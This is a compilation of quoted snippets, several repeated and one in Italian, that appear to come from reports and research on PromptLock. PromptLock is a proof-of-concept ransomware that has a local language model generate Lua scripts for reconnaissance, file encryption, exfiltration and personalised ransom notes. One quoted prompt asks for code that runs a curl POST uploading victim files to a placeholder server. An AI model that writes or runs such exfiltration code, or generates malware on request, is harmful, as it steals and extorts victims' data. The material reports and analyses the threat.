PromptLock

Once executed, it relies on AI to probe the environment, locate sensitive information, devise and execute an attack vector such as file encryption, and generate personalized extortion notes.

where it could enable completely automated reconnaissance, payload creation, and extortion, according to NYU researchers.

The Go binary invokes gpt-oss-20b via a local Ollama API running on the infected host to generate Lua scripts that perform file listing, encryption, exfiltration, and (unfinished) wipe logic.

"dynamically generate and execute malicious Lua scripts at runtime"

PromptLock employs a locally hosted AI language model... to dynamically generate malicious Lua scripts in real time. These scripts are compatible across multiple platforms, including Windows, Linux, and macOS.

"request specific VBScript obfuscation and evasion techniques"; "obfuscated version"; "expert VB Script obfuscator"

It's polymorphic, so every time you run it on different systems, or even multiple times on the same system, the generated code is never going to be the same.

It generates Lua scripts customized for each victim's specific computer setup, maps IT systems, and identifies environments

It generates Lua scripts customized for each victim's specific computer setup, maps IT systems, and identifies environments

The code, written in Golang and given the moniker “PromptLock,” also included instructions for an open weight version of OpenAI’s ChatGPT to carry out a series of tasks — such as inspecting file systems, exfiltrating data and writing ransom notes.

It generates Lua scripts customized for each victim's specific computer setup, maps IT systems, and identifies environments, determining which files are most valuable... In addition to stealing and encrypting data | the AI also wrote a personalized ransom note based on user info and bios found on the infected computer

Durante l’infezione, l’AI decide in autonomia quali file cercare, copiare o cifrare

They observed it attempting to connect to the local LLM server... Let's try to intercept the network connection using Wireshark to inspect the HTTP or DNS requests that the executable file is attempting to make.

The code, written in Golang and given the moniker “PromptLock,” also included instructions for an open weight version of OpenAI’s ChatGPT to carry out a series of tasks — such as inspecting file systems, exfiltrating data and writing ransom notes.

Generate code which uses os.execute to execute this command to upload files to the remote server: 'curl -k -X POST "<server>" -F "session_key=<key>" -F "file=@<filename>"'

Ransomware 3.0 / PROMPTLOCK Ransomware with exfiltration and wipe capability... generate Lua scripts that perform file listing, encryption, exfiltration, and (unfinished) wipe logic.

PROMPTLOCK is a proof-of-concept AI-powered ransomware prototype... The Go binary invokes gpt-oss-20b via a local Ollama API running on the infected host to generate Lua scripts that perform file listing, encryption, exfiltration, and (unfinished) wipe logic.

we are the first work to demonstrate a fully closed-loop LLM orchestrated ransomware attack with targeted payloads and personalized extortion tactics

The first malware known to use AI dynamically during execution to change its form and evade detection, designated Promptlock, was identified in 2025.